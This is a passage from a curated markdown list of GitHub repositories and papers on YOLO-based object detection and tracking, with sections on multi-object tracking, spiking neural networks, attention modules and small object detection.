[kadirnar/yolov5-strongsort](https://github.com/kadirnar/yolov5-strongsort) <img src="https://img.shields.io/github/stars/kadirnar/yolov5-strongsort?style=social"/> : Minimal PyTorch implementation of YOLOv5 and [StrongSORT](https://github.com/dyhBUPT/StrongSORT). - [ZQPei/deep_sort_pytorch](https://github.com/ZQPei/deep_sort_pytorch) <img src="https://img.shields.io/github/stars/ZQPei/deep_sort_pytorch?style=social"/> : MOT using deepsort and yolov3 with pytorch. - [Qidian213/deep_sort_yolov3](https://github.com/Qidian213/deep_sort_yolov3) <img src="https://img.shields.io/github/stars/Qidian213/deep_sort_yolov3?style=social"/> : Real-time Multi-person tracker using YOLO v3 and deep_sort with tensorflow. - [CSTrack](https://github.com/JudasDie/SOTS) <img src="https://img.shields.io/github/stars/JudasDie/SOTS?style=social"/> : "Rethinking the competition between detection and ReID in Multi-Object Tracking". (**[arXiv 2020](https://arxiv.org/abs/2010.12138)**) - [ROLO](https://github.com/Guanghan/ROLO) <img src="https://img.shields.io/github/stars/Guanghan/ROLO?style=social"/> : ROLO is short for Recurrent YOLO, aimed at simultaneous object detection and tracking. - [FastMOT](https://github.com/GeekAlexis/FastMOT) <img src="https://img.shields.io/github/stars/GeekAlexis/FastMOT?style=social"/> : "FastMOT: High-Performance Multiple Object Tracking Based on Deep SORT and KLT". (**[Zenodo 2020](https://doi.org/10.5281/zenodo.4294717)**) - [Sharpiless/Yolov5-deepsort-inference](https://github.com/Sharpiless/Yolov5-deepsort-inference) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-deepsort-inference?style=social"/> : ไฝฟ็”จYOLOv5+Deepsortๅฎž็Žฐ่ฝฆ่พ†่กŒไบบ่ฟฝ่ธชๅ’Œ่ฎกๆ•ฐ๏ผŒไปฃ็ ๅฐ่ฃ…ๆˆไธ€ไธชDetector็ฑป๏ผŒๆ›ดๅฎนๆ˜“ๅตŒๅ…ฅๅˆฐ่‡ชๅทฑ็š„้กน็›ฎไธญใ€‚ - [Sharpiless/Yolov5-Deepsort](https://github.com/Sharpiless/Yolov5-Deepsort) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-Deepsort?style=social"/> : ๆœ€ๆ–ฐ็‰ˆๆœฌyolov5+deepsort็›ฎๆ ‡ๆฃ€ๆต‹ๅ’Œ่ฟฝ่ธช๏ผŒ่ƒฝๅคŸๆ˜พ็คบ็›ฎๆ ‡็ฑปๅˆซ๏ผŒๆ”ฏๆŒ5.0็‰ˆๆœฌๅฏ่ฎญ็ปƒ่‡ชๅทฑๆ•ฐๆฎ้›†ใ€‚ - [LeonLok/Multi-Camera-Live-Object-Tracking](https://github.com/LeonLok/Multi-Camera-Live-Object-Tracking) <img src="https://img.shields.io/github/stars/LeonLok/Multi-Camera-Live-Object-Tracking?style=social"/> : Multi-camera live traffic and object counting with YOLO v4, Deep SORT, and Flask. - [LeonLok/Deep-SORT-YOLOv4](https://github.com/LeonLok/Deep-SORT-YOLOv4) <img src="https://img.shields.io/github/stars/LeonLok/Deep-SORT-YOLOv4?style=social"/> : People detection and optional tracking with Tensorflow backend. - [obendidi/Tracking-with-darkflow](https://github.com/obendidi/Tracking-with-darkflow) <img src="https://img.shields.io/github/stars/obendidi/Tracking-with-darkflow?style=social"/> : Real-time people Multitracker using YOLO v2 and deep_sort with tensorflow. - [DrewNF/Tensorflow_Object_Tracking_Video](https://github.com/DrewNF/Tensorflow_Object_Tracking_Video) <img src="https://img.shields.io/github/stars/DrewNF/Tensorflow_Object_Tracking_Video?style=social"/> : Object Tracking in Tensorflow ( Localization Detection Classification ) developed to partecipate to ImageNET VID competition. - [dyh/unbox_yolov5_deepsort_counting](https://github.com/dyh/unbox_yolov5_deepsort_counting) <img src="https://img.shields.io/github/stars/dyh/unbox_yolov5_deepsort_counting?style=social"/> : yolov5 deepsort ่กŒไบบ ่ฝฆ่พ† ่ทŸ่ธช ๆฃ€ๆต‹ ่ฎกๆ•ฐใ€‚ - [theAIGuysCode/yolov3_deepsort](https://github.com/theAIGuysCode/yolov3_deepsort) <img src="https://img.shields.io/github/stars/theAIGuysCode/yolov3_deepsort?style=social"/> : Object tracking implemented with YOLOv3, Deep Sort and Tensorflow. - [weixu000/libtorch-yolov3-deepsort](https://github.com/weixu000/libtorch-yolov3-deepsort) <img src="https://img.shields.io/github/stars/weixu000/libtorch-yolov3-deepsort?style=social"/> : libtorch-yolov3-deepsort. - [pmj110119/YOLOX_deepsort_tracker](https://github.com/pmj110119/YOLOX_deepsort_tracker) <img src="https://img.shields.io/github/stars/pmj110119/YOLOX_deepsort_tracker?style=social"/> : using yolox+deepsort for object-tracking. - [abhyantrika/nanonets_object_tracking](https://github.com/abhyantrika/nanonets_object_tracking) <img src="https://img.shields.io/github/stars/abhyantrika/nanonets_object_tracking?style=social"/> : nanonets_object_tracking. - [mattzheng/keras-yolov3-KF-objectTracking](https://github.com/mattzheng/keras-yolov3-KF-objectTracking) <img src="https://img.shields.io/github/stars/mattzheng/keras-yolov3-KF-objectTracking?style=social"/> : ไปฅkears-yolov3ๅšdetector๏ผŒไปฅKalman-Filter็ฎ—ๆณ•ๅštracker๏ผŒ่ฟ›่กŒๅคšไบบ็‰ฉ็›ฎๆ ‡่ฟฝ่ธชใ€‚ - [rohanchandra30/TrackNPred](https://github.com/rohanchandra30/TrackNPred) <img src="https://img.shields.io/github/stars/rohanchandra30/TrackNPred?style=social"/> : A Software Framework for End-to-End Trajectory Prediction. - [RichardoMrMu/yolov5-deepsort-tensorrt](https://github.com/RichardoMrMu/yolov5-deepsort-tensorrt) <img src="https://img.shields.io/github/stars/RichardoMrMu/yolov5-deepsort-tensorrt?style=social"/> : A c++ implementation of yolov5 and deepsort. - [bamwani/car-counting-and-speed-estimation-yolo-sort-python](https://github.com/bamwani/car-counting-and-speed-estimation-yolo-sort-python) <img src="https://img.shields.io/github/stars/bamwani/car-counting-and-speed-estimation-yolo-sort-python?style=social"/> : This project imlements the following tasks in the project: 1. Vehicle counting, 2. Lane detection. 3.Lane change detection and 4.speed estimation. - [ArtLabss/tennis-tracking](https://github.com/ArtLabss/tennis-tracking) <img src="https://img.shields.io/github/stars/ArtLabss/tennis-tracking?style=social"/> : Open-source Monocular Python HawkEye for Tennis. - [CaptainEven/YOLOV4_MCMOT](https://github.com/CaptainEven/YOLOV4_MCMOT) <img src="https://img.shields.io/github/stars/CaptainEven/YOLOV4_MCMOT?style=social"/> : Using YOLOV4 as detector for MCMOT. - [opendatacam/node-moving-things-tracker](https://github.com/opendatacam/node-moving-things-tracker) <img src="https://img.shields.io/github/stars/opendatacam/node-moving-things-tracker?style=social"/> : javascript implementation of "tracker by detections" for realtime multiple object tracking (MOT). - [lanmengyiyu/yolov5-deepmar](https://github.com/lanmengyiyu/yolov5-deepmar) <img src="https://img.shields.io/github/stars/lanmengyiyu/yolov5-deepmar?style=social"/> : ่กŒไบบ่ฝจ่ฟนๅ’Œๅฑžๆ€งๅˆ†ๆžใ€‚ - [zengwb-lx/Yolov5-Deepsort-Fastreid](https://github.com/zengwb-lx/Yolov5-Deepsort-Fastreid) <img src="https://img.shields.io/github/stars/zengwb-lx/Yolov5-Deepsort-Fastreid?style=social"/> : YoloV5 + deepsort + Fast-ReID ๅฎŒๆ•ด่กŒไบบ้‡่ฏ†ๅˆซ็ณป็ปŸใ€‚ - [tensorturtle/classy-sort-yolov5](https://github.com/tensorturtle/classy-sort-yolov5) <img src="https://img.shields.io/github/stars/tensorturtle/classy-sort-yolov5?style=social"/> : Ready-to-use realtime multi-object tracker that works for any object category. YOLOv5 + SORT implementation. - [supperted825/FairMOT-X](https://github.com/supperted825/FairMOT-X) <img src="https://img.shields.io/github/stars/supperted825/FairMOT-X?style=social"/> : FairMOT for Multi-Class MOT using YOLOX as Detector. - [deyiwang89/pytorch-yolov7-deepsort](https://github.com/deyiwang89/pytorch-yolov7-deepsort) <img src="https://img.shields.io/github/stars/deyiwang89/pytorch-yolov7-deepsort?style=social"/> : an implentation of yolov7-deepsort based on pytorch. - [xuarehere/yolovx_deepsort_pytorch](https://github.com/xuarehere/yolovx_deepsort_pytorch) <img src="https://img.shields.io/github/stars/xuarehere/yolovx_deepsort_pytorch?style=social"/> : this project support the existing yolo detection model algorithm (YOLOv3, YOLOV4, YOLOV4Scaled, YOLOV5, YOLOV6, YOLOV7 ). - [deshwalmahesh/yolov7-deepsort-tracking](https://github.com/deshwalmahesh/yolov7-deepsort-tracking) <img src="https://img.shields.io/github/stars/deshwalmahesh/yolov7-deepsort-tracking?style=social"/> : Modular and ready to deploy code to detect and track videos using YOLO-v7 and DeepSORT. - [RizwanMunawar/yolov7-object-tracking](https://github.com/RizwanMunawar/yolov7-object-tracking) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-object-tracking?style=social"/> : YOLOv7 Object Tracking Using PyTorch, OpenCV and Sort Tracking. - [RizwanMunawar/yolov5-object-tracking](https://github.com/RizwanMunawar/yolov5-object-tracking) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov5-object-tracking?style=social"/> : YOLOv5 Object Tracking + Detection + Object Blurring + Streamlit Dashboard Using OpenCV, PyTorch and Streamlit. - [Smorodov/Multitarget-tracker](https://github.com/Smorodov/Multitarget-tracker) <img src="https://img.shields.io/github/stars/Smorodov/Multitarget-tracker?style=social"/> : Multiple Object Tracker, Based on Hungarian algorithm + Kalman filter. - [Naughty-Galileo/YoloV5_MCMOT](https://github.com/Naughty-Galileo/YoloV5_MCMOT) <img src="https://img.shields.io/github/stars/Naughty-Galileo/YoloV5_MCMOT?style=social"/> : ๅคš็ฑปๅˆซๅคš็›ฎๆ ‡่ทŸ่ธชYoloV5+sort/deepsort/bytetrack/BotSort/motdt. - [MuhammadMoinFaisal/YOLOv8-DeepSORT-Object-Tracking](https://github.com/MuhammadMoinFaisal/YOLOv8-DeepSORT-Object-Tracking) <img src="https://img.shields.io/github/stars/MuhammadMoinFaisal/YOLOv8-DeepSORT-Object-Tracking?style=social"/> : YOLOv8 Object Tracking using PyTorch, OpenCV and DeepSORT. - [sujanshresstha/YOLO-NAS_DeepSORT](https://github.com/sujanshresstha/YOLO-NAS_DeepSORT) <img src="https://img.shields.io/github/stars/sujanshresstha/YOLO-NAS_DeepSORT?style=social"/> : This repository contains code for object tracking in videos using the YOLO-NAS object detection model and the DeepSORT algorithm. - #### Dynamic Object Tracking ##### ๅŠจๆ€็›ฎๆ ‡่ทŸ่ธช - [PolyU-AIRO-Lab/AUTO](https://github.com/PolyU-AIRO-Lab/AUTO) <img src="https://img.shields.io/github/stars/PolyU-AIRO-Lab/AUTO?style=social"/> : "Dynamic Object Tracking on Autonomous UAV System for Surveillance Applications". (**[Sensors 2021](https://www.mdpi.com/1424-8220/21/23/7888)**) - #### Deep Reinforcement Learning #### ๆทฑๅบฆๅผบๅŒ–ๅญฆไน  - [uzkent/EfficientObjectDetection](https://github.com/uzkent/EfficientObjectDetection) <img src="https://img.shields.io/github/stars/uzkent/EfficientObjectDetection?style=social"/> : "Efficient Object Detection in Large Images with Deep Reinforcement Learning". (**[WACV 2020](https://openaccess.thecvf.com/content_WACV_2020/html/Uzkent_Efficient_Object_Detection_in_Large_Images_Using_Deep_Reinforcement_Learning_WACV_2020_paper.html)**) - #### Motion Control Field #### ่ฟๅŠจๆŽงๅˆถ้ข†ๅŸŸ - [icns-distributed-cloud/adaptive-cruise-control](https://github.com/icns-distributed-cloud/adaptive-cruise-control) <img src="https://img.shields.io/github/stars/icns-distributed-cloud/adaptive-cruise-control?style=social"/> : YOLO-v5 ๊ธฐ๋ฐ˜ "๋‹จ์•ˆ ์นด๋ฉ”๋ผ"์˜ ์˜์ƒ์„ ํ™œ์šฉํ•ด ์ฐจ๊ฐ„ ๊ฑฐ๋ฆฌ๋ฅผ ์ผ์ •ํ•˜๊ฒŒ ์œ ์ง€ํ•˜๋ฉฐ ์ฃผํ–‰ํ•˜๋Š” Adaptive Cruise Control ๊ธฐ๋Šฅ ๊ตฌํ˜„. - [LeBronLiHD/ZJU2021_MotionControl_PID_YOLOv5](https://github.com/LeBronLiHD/ZJU2021_MotionControl_PID_YOLOv5) <img src="https://img.shields.io/github/stars/LeBronLiHD/ZJU2021_MotionControl_PID_YOLOv5?style=social"/> : ZJU2021_MotionControl_PID_YOLOv5. - [SananSuleymanov/PID_YOLOv5s_ROS_Diver_Tracking](https://github.com/SananSuleymanov/PID_YOLOv5s_ROS_Diver_Tracking) <img src="https://img.shields.io/github/stars/SananSuleymanov/PID_YOLOv5s_ROS_Diver_Tracking?style=social"/> : PID_YOLOv5s_ROS_Diver_Tracking. - [sumght-z/apex_yolov5](https://github.com/sumght-z/apex_yolov5) <img src="https://img.shields.io/github/stars/sumght-z/apex_yolov5?style=social"/> : something by yolov5 and PID. - #### Super-Resolution Field #### ่ถ…ๅˆ†่พจ็Ž‡้ข†ๅŸŸ - [Fireboltz/Psychic-CCTV](https://github.com/Fireboltz/Psychic-CCTV) <img src="https://img.shields.io/github/stars/Fireboltz/Psychic-CCTV?style=social"/> : A video analysis tool built completely in python. - #### Spiking Neural Network #### SNN, ่„‰ๅ†ฒ็ฅž็ป็ฝ‘็ปœ - [EMS-YOLO](https://github.com/BICLab/EMS-YOLO) <img src="https://img.shields.io/github/stars/BICLab/EMS-YOLO?style=social"/> : Offical implementation of "Deep Directly-Trained Spiking Neural Networks for Object Detection" (**[ICCV 2023](https://openaccess.thecvf.com/content/ICCV2023/html/Su_Deep_Directly-Trained_Spiking_Neural_Networks_for_Object_Detection_ICCV_2023_paper.html)**) - [Attention-SNN](https://github.com/BICLab/Attention-SNN) <img src="https://img.shields.io/github/stars/BICLab/Attention-SNN?style=social"/> : Offical implementation of "Attention Spiking Neural Networks" (**[IEEE TPAMI 2023](https://ieeexplore.ieee.org/abstract/document/10032591)**) - [Spike-Driven-Transformer](https://github.com/BICLab/Spike-Driven-Transformer) <img src="https://img.shields.io/github/stars/BICLab/Spike-Driven-Transformer?style=social"/> : Offical implementation of "Spike-driven Transformer" (**[NeurIPS 2023](https://openreview.net/forum?id=9FmolyOHi5)**) - [Spike-Driven-Transformer-V2](https://github.com/BICLab/Spike-Driven-Transformer-V2) <img src="https://img.shields.io/github/stars/BICLab/Spike-Driven-Transformer-V2?style=social"/> : Offical implementation of "Spike-driven Transformer V2: Meta Spiking Neural Network Architecture Inspiring the Design of Next-generation Neuromorphic Chips" (**[ICLR 2024](https://openreview.net/forum?id=1SIBN5Xyw7)**) - [Spiking-YOLOv3](https://github.com/cwq159/PyTorch-Spiking-YOLOv3) <img src="https://img.shields.io/github/stars/cwq159/PyTorch-Spiking-YOLOv3?style=social"/> : A PyTorch implementation of Spiking-YOLOv3. Two branches are provided, based on two common PyTorch implementation of YOLOv3([ultralytics/yolov3](https://github.com/ultralytics/yolov3) & [eriklindernoren/PyTorch-YOLOv3](https://github.com/eriklindernoren/PyTorch-YOLOv3)), with support for Spiking-YOLOv3-Tiny at present. (**[AAAI 2020](https://ojs.aaai.org/index.php/AAAI/article/view/6787)**) - [fjcu-ee-islab/Spiking_Converted_YOLOv4](https://github.com/fjcu-ee-islab/Spiking_Converted_YOLOv4) <img src="https://img.shields.io/github/stars/fjcu-ee-islab/Spiking_Converted_YOLOv4?style=social"/> : Object Detection Based on Dynamic Vision Sensor with Spiking Neural Network. - [Zaabon/spiking_yolo](https://github.com/Zaabon/spiking_yolo) <img src="https://img.shields.io/github/stars/Zaabon/spiking_yolo?style=social"/> : This project is a combined neural network utilizing an spiking CNN with backpropagation and YOLOv3 for object detection. - [Dignity-ghost/PyTorch-Spiking-YOLOv3](https://github.com/Dignity-ghost/PyTorch-Spiking-YOLOv3) <img src="https://img.shields.io/github/stars/Dignity-ghost/PyTorch-Spiking-YOLOv3?style=social"/> : A modified repository based on [Spiking-YOLOv3](https://github.com/cwq159/PyTorch-Spiking-YOLOv3) and [YOLOv3](https://pjreddie.com/darknet/yolo), which makes it suitable for VOC-dataset and YOLOv2. - [beauty-girl-cxy/spiking-yolov5](https://github.com/beauty-girl-cxy/spiking-yolov5) <img src="https://img.shields.io/github/stars/beauty-girl-cxy/spiking-yolov5?style=social"/> : spiking-yolov5. - #### Attention and Transformer #### ๆณจๆ„ๅŠ›ๆœบๅˆถ - [xmu-xiaoma666/External-Attention-pytorch](https://github.com/xmu-xiaoma666/External-Attention-pytorch) <img src="https://img.shields.io/github/stars/xmu-xiaoma666/External-Attention-pytorch?style=social"/> : ๐Ÿ€ Pytorch implementation of various Attention Mechanisms, MLP, Re-parameter, Convolution, which is helpful to further understand papers.โญโญโญ. - [MenghaoGuo/Awesome-Vision-Attentions](https://github.com/MenghaoGuo/Awesome-Vision-Attentions) <img src="https://img.shields.io/github/stars/MenghaoGuo/Awesome-Vision-Attentions?style=social"/> : Summary of related papers on visual attention. Related code will be released based on Jittor gradually. "Attention Mechanisms in Computer Vision: A Survey". (**[arXiv 2021](https://arxiv.org/abs/2111.07624)**) - [pprp/awesome-attention-mechanism-in-cv](https://github.com/pprp/awesome-attention-mechanism-in-cv) <img src="https://img.shields.io/github/stars/pprp/awesome-attention-mechanism-in-cv?style=social"/> : ๐Ÿ‘Š CVไธญๅธธ็”จๆณจๆ„ๅŠ›ๆจกๅ—;ๅณๆ’ๅณ็”จๆจกๅ—;ViTๆจกๅž‹. PyTorch Implementation Collection of Attention Module and Plug&Play Module. - [AbSViT](https://github.com/bfshi/AbSViT) <img src="https://img.shields.io/github/stars/bfshi/AbSViT?style=social"/> : "Top-Down Visual Attention from Analysis by Synthesis". (**[CVPR 2023](https://arxiv.org/abs/2303.13043)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๅ‰ๆฒฟ่ฎฒไน ใ€ใ€Š[ใ€ๆบๅคดๆดปๆฐดใ€‘CVPR 2023 | AbSViT๏ผšๆ‹ฅๆœ‰่‡ชไธŠ่€Œไธ‹ๆณจๆ„ๅŠ›ๆœบๅˆถ็š„่ง†่ง‰Transformer](https://mp.weixin.qq.com/s/FtVd37tOXMfu92eDSvdvbg)ใ€‹"ใ€‚ "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆžๅธ‚ๅนณๅฐใ€ใ€Š[CVPR23 Highlight๏ฝœๆ‹ฅๆœ‰top-down attention่ƒฝๅŠ›็š„vision transformer](https://mp.weixin.qq.com/s/UMA3Vk9L71zUEtNkCshYBg)ใ€‹"ใ€‚ - [HaloTrouvaille/YOLO-Multi-Backbones-Attention](https://github.com/HaloTrouvaille/YOLO-Multi-Backbones-Attention) <img src="https://img.shields.io/github/stars/HaloTrouvaille/YOLO-Multi-Backbones-Attention?style=social"/> : This Repository includes YOLOv3 with some lightweight backbones (ShuffleNetV2, GhostNet, VoVNet), some computer vision attention mechanism (SE Block, CBAM Block, ECA Block), pruning,quantization and distillation for GhostNet. - [kay-cottage/CoordAttention_YOLOX_Pytorch](https://github.com/kay-cottage/CoordAttention_YOLOX_Pytorch) <img src="https://img.shields.io/github/stars/kay-cottage/CoordAttention_YOLOX_Pytorch?style=social"/> : CoordAttention_YOLOX(ๅŸบไบŽCoordAttentionๅๆ ‡ๆณจๆ„ๅŠ›ๆœบๅˆถ็š„ๆ”น่ฟ›็‰ˆYOLOX็›ฎๆ ‡ๆฃ€ๆต‹ๅนณๅฐ๏ผ‰ใ€‚ "Coordinate Attention for Efficient Mobile Network Design". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Hou_Coordinate_Attention_for_Efficient_Mobile_Network_Design_CVPR_2021_paper.html), [ Andrew-Qibin/CoordAttention](https://github.com/Andrew-Qibin/CoordAttention)**) - [liangzhendong123/Attention-yolov5](https://github.com/liangzhendong123/Attention-yolov5) <img src="https://img.shields.io/github/stars/liangzhendong123/Attention-yolov5?style=social"/> : ๅŸบไบŽๆณจๆ„ๅŠ›ๆœบๅˆถๆ”น่ฟ›็š„yolov5ๆจกๅž‹ใ€‚ - [e96031413/AA-YOLO](https://github.com/e96031413/AA-YOLO) <img src="https://img.shields.io/github/stars/e96031413/AA-YOLO?style=social"/> : Attention ALL-CNN Twin Head YOLO (AA -YOLO). "Improving Tiny YOLO with Fewer Model Parameters". (**[IEEE BigMM 2021](https://ieeexplore.ieee.org/abstract/document/9643269/)**) - [anonymoussss/YOLOX-SwinTransformer](https://github.com/anonymoussss/YOLOX-SwinTransformer) <img src="https://img.shields.io/github/stars/anonymoussss/YOLOX-SwinTransformer?style=social"/> : YOLOX with Swin-Transformer backbone. - [GuanRunwei/MAN-and-CAT](https://github.com/GuanRunwei/MAN-and-CAT) <img src="https://img.shields.io/github/stars/GuanRunwei/MAN-and-CAT?style=social"/> : "MAN and CAT: mix attention to nn and concatenate attention to YOLO". (**[ The Journal of Supercomputing, 2022](https://link.springer.com/article/10.1007/s11227-022-04726-7)**) - ### Small Object Detection #### ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ - [kuanhungchen/awesome-tiny-object-detection](https://github.com/kuanhungchen/awesome-tiny-object-detection) <img src="https://img.shields.io/github/stars/kuanhungchen/awesome-tiny-object-detection?style=social"/> : ๐Ÿ•ถ A curated list of Tiny Object Detection papers and related resources. - [shaunyuan22/SODA](https://github.com/shaunyuan22/SODA) <img src="https://img.shields.io/github/stars/shaunyuan22/SODA?style=social"/> : Official code library for SODA: A Large-scale Benchmark for Small Object Detection. "Towards Large-Scale Small Object Detection: Survey and Benchmarks". (**[arXiv 2022](https://arxiv.org/abs/2207.14096)**) - [SAHI](https://github.com/obss/sahi) <img src="https://img.shields.io/github/stars/obss/sahi?style=social"/> : "Slicing Aided Hyper Inference and Fine-tuning for Small Object Detection". (**[arXiv 2022](https://arxiv.org/abs/2202.06934v2), [Zenodo 2021](https://doi.org/10.5281/zenodo.5718950)**). A lightweight vision library for performing large scale object detection/ instance segmentation. SAHI currently supports [YOLOv5 models](https://github.com/ultralytics/yolov5/releases), [MMDetection models](https://github.com/open-mmlab/mmdetection/blob/master/docs/en/model_zoo.md), [Detectron2 models](https://github.com/facebookresearch/detectron2/blob/main/MODEL_ZOO.md), [HuggingFace models](https://huggingface.co/models?pipeline_tag=object-detection&sort=downloads) and [TorchVision models](https://pytorch.org/docs/stable/torchvision/models.html). - [Slim-neck by GSConv](https://github.com/AlanLi1997/slim-neck-by-gsconv) <img src="https://img.shields.io/github/stars/AlanLi1997/slim-neck-by-gsconv?style=social"/> : "Slim-neck by GSConv: A better design paradigm of detector architectures for autonomous vehicles". (**[arXiv 2022](https://arxiv.org/abs/2206.02424)**) - [hustvl/TinyDet](https://github.com/hustvl/TinyDet) <img src="https://img.shields.io/github/stars/hustvl/TinyDet?style=social"/> : "TinyDet: accurately detecting small objects within 1 GFLOPs". (**[Science China Information Sciences, 2023](https://link.springer.com/article/10.1007/s11432-021-3504-4)**) - [QueryDet](https://github.com/ChenhongyiYang/QueryDet-PyTorch) <img src="https://img.shields.io/github/stars/ChenhongyiYang/QueryDet-PyTorch?style=social"/> : "QueryDet: Cascaded Sparse Query for Accelerating High-Resolution Small Object Detection". (**[CVPR 2022](https://openaccess.thecvf.com/content/CVPR2022/html/Yang_QueryDet_Cascaded_Sparse_Query_for_Accelerating_High-Resolution_Small_Object_Detection_CVPR_2022_paper.html)**) - [RFLA](https://github.com/Chasel-Tsui/mmdet-rfla) <img src="https://img.shields.io/github/stars/Chasel-Tsui/mmdet-rfla?style=social"/> : "RFLA: Gaussian Receptive Field based Label Assignment for Tiny Object Detection". (**[ECCV 2022](https://arxiv.org/abs/2208.08738)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVๆŠ€ๆœฏๆŒ‡ๅ—ใ€ใ€Š[ECCV 2022 | RFLA๏ผšๅŸบไบŽ้ซ˜ๆ–ฏๆ„Ÿๅ—้‡Ž็š„ๅพฎๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ๆ ‡็ญพๅˆ†้…](https://mp.weixin.qq.com/s/h0J775I3D6zoTIeaJRnFgQ)ใ€‹" - [YOLT](https://github.com/avanetten/yolt) <img src="https://img.shields.io/github/stars/avanetten/yolt?style=social"/> : "You Only Look Twice: Rapid Multi-Scale Object Detection In Satellite Imagery". (**[arXiv 2018](https://arxiv.org/abs/1805.09512)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๆฑŸๅคง็™ฝใ€ใ€Š[ๅŸบไบŽๅคงๅฐบๅฏธๅ›พๅƒ็š„ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็ซž่ต›็ป้ชŒๆ€ป็ป“](https://mp.weixin.qq.com/s?__biz=Mzg5NzgyNTU2Mg==&mid=2247498265&idx=1&sn=1eee95f8f4d09d761dc7b94f4ac55c34&source=41#wechat_redirect)ใ€‹" - [SIMRDWN](https://github.com/avanetten/simrdwn) <img src="https://img.shields.io/github/stars/avanetten/simrdwn?style=social"/> : "Satellite Imagery Multiscale Rapid Detection with Windowed Networks". (**[arXiv 2018](https://arxiv.org/abs/1809.09978), [WACV 2019](https://ieeexplore.ieee.org/abstract/document/8659155)**) - [YOLTv5](https://github.com/avanetten/yoltv5) <img src="https://img.shields.io/github/stars/avanetten/yoltv5?style=social"/> : YOLTv5 builds upon [YOLT](https://github.com/avanetten/yolt) and [SIMRDWN](https://github.com/avanetten/simrdwn), and updates these frameworks to use the [ultralytics/yolov5](https://github.com/ultralytics/yolov5) version of the YOLO object detection family. - [TPH-YOLOv5](https://github.com/cv516Buaa/tph-yolov5) <img src="https://img.shields.io/github/stars/cv516Buaa/tph-yolov5?style=social"/> : "TPH-YOLOv5: Improved YOLOv5 Based on Transformer Prediction Head for Object Detection on Drone-Captured Scenarios". (**[ICCV 2021](https://openaccess.thecvf.com/content/ICCV2021W/VisDrone/html/Zhu_TPH-YOLOv5_Improved_YOLOv5_Based_on_Transformer_Prediction_Head_for_Object_ICCVW_2021_paper.html)**) - [mwaseema/Drone-Detection](https://github.com/mwaseema/Drone-Detection) <img src="https://img.shields.io/github/stars/mwaseema/Drone-Detection?style=social"/> : "Dogfight: Detecting Drones from Drones Videos". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Ashraf_Dogfight_Detecting_Drones_From_Drones_Videos_CVPR_2021_paper.html)**) - [CEASA](https://github.com/cuogeihong/ceasc) <img src="https://img.shields.io/github/stars/cuogeihong/ceasc?style=social"/> : "Adaptive Sparse Convolutional Networks with Global Context Enhancement for Faster Object Detection on Drone Images". (**[arXiv 2023](https://arxiv.org/abs/2303.14488)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[ๅณๆ’ๅณ็”จ | CEASAๆจกๅ—็ป™ไฝ ๆ‰€ๆœ‰๏ผŒๅฐ็›ฎๆ ‡็ฒพๅบฆๆๅ‡็š„ๅŒๆ—ถ้€ŸๅบฆไนŸๅ˜ๅฟซไบ†](https://mp.weixin.qq.com/s/-a4Wz04jLHFiAU88pUyDNQ)ใ€‹" - [KevinMuyaoGuo/yolov5s_for_satellite_imagery](https://github.com/KevinMuyaoGuo/yolov5s_for_satellite_imagery) <img src="https://img.shields.io/github/stars/KevinMuyaoGuo/yolov5s_for_satellite_imagery?style=social"/> : ๅŸบไบŽYOLOv5็š„ๅซๆ˜Ÿๅ›พๅƒ็›ฎๆ ‡ๆฃ€ๆต‹demo | A demo for satellite imagery object detection based on YOLOv5ใ€‚ - [Hongyu-Yue/yoloV5_modify_smalltarget](https://github.com/Hongyu-Yue/yoloV5_modify_smalltarget) <img src="https://img.shields.io/github/stars/Hongyu-Yue/yoloV5_modify_smalltarget?style=social"/> : YOLOV5 ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไฟฎๆ”น็‰ˆใ€‚ - [muyuuuu/Self-Supervise-Object-Detection](https://github.com/muyuuuu/Self-Supervise-Object-Detection) <img src="https://img.shields.io/github/stars/muyuuuu/Self-Supervise-Object-Detection?style=social"/> : Self-Supervised Object Detection. ๆฐด้ขๆผ‚ๆตฎๅžƒๅœพ็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒๅˆ†ๆžๆบ็ ๆ”นๅ–„ yolox ๆฃ€ๆต‹ๅฐ็›ฎๆ ‡็š„็ผบ้™ท๏ผŒๆๅ‡บ่‡ช็›‘็ฃ็ฎ—ๆณ•้ข„่ฎญ็ปƒๆ— ๆ ‡็ญพๆ•ฐๆฎ๏ผŒๆๅ‡ๆฃ€ๆต‹ๆ€ง่ƒฝใ€‚ - [swricci/small-boat-detector](https://github.com/swricci/small-boat-detector) <img src="https://img.shields.io/github/stars/swricci/small-boat-detector?style=social"/> : Trained yolo v3 model weights and configuration file to detect small boats in satellite imagery. - [Resham-Sundar/sahi-yolox](https://github.com/Resham-Sundar/sahi-yolox) <img src="https://img.shields.io/github/stars/Resham-Sundar/sahi-yolox?style=social"/> : YoloX with SAHI Implementation. - YOLO-Z : "YOLO-Z: Improving small object detection in YOLOv5 for autonomous vehicles". (**[arXiv 2021](https://arxiv.org/abs/2112.11798)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰็ ”็ฉถ้™ขใ€ใ€Š[Yolo-Z๏ผšๆ”น่ฟ›็š„YOLOv5็”จไบŽๅฐ็›ฎๆ ‡ๆฃ€ๆต‹๏ผˆ้™„ๅŽŸ่ฎบๆ–‡ไธ‹่ฝฝ๏ผ‰](https://mp.weixin.qq.com/s/ehkUapLOMdDghF2kAoAV4w)ใ€‹". - M2S : "A novel Multi to Single Module for small object detection". (**[arXiv 2023](https://arxiv.org/abs/2303.14977)**). 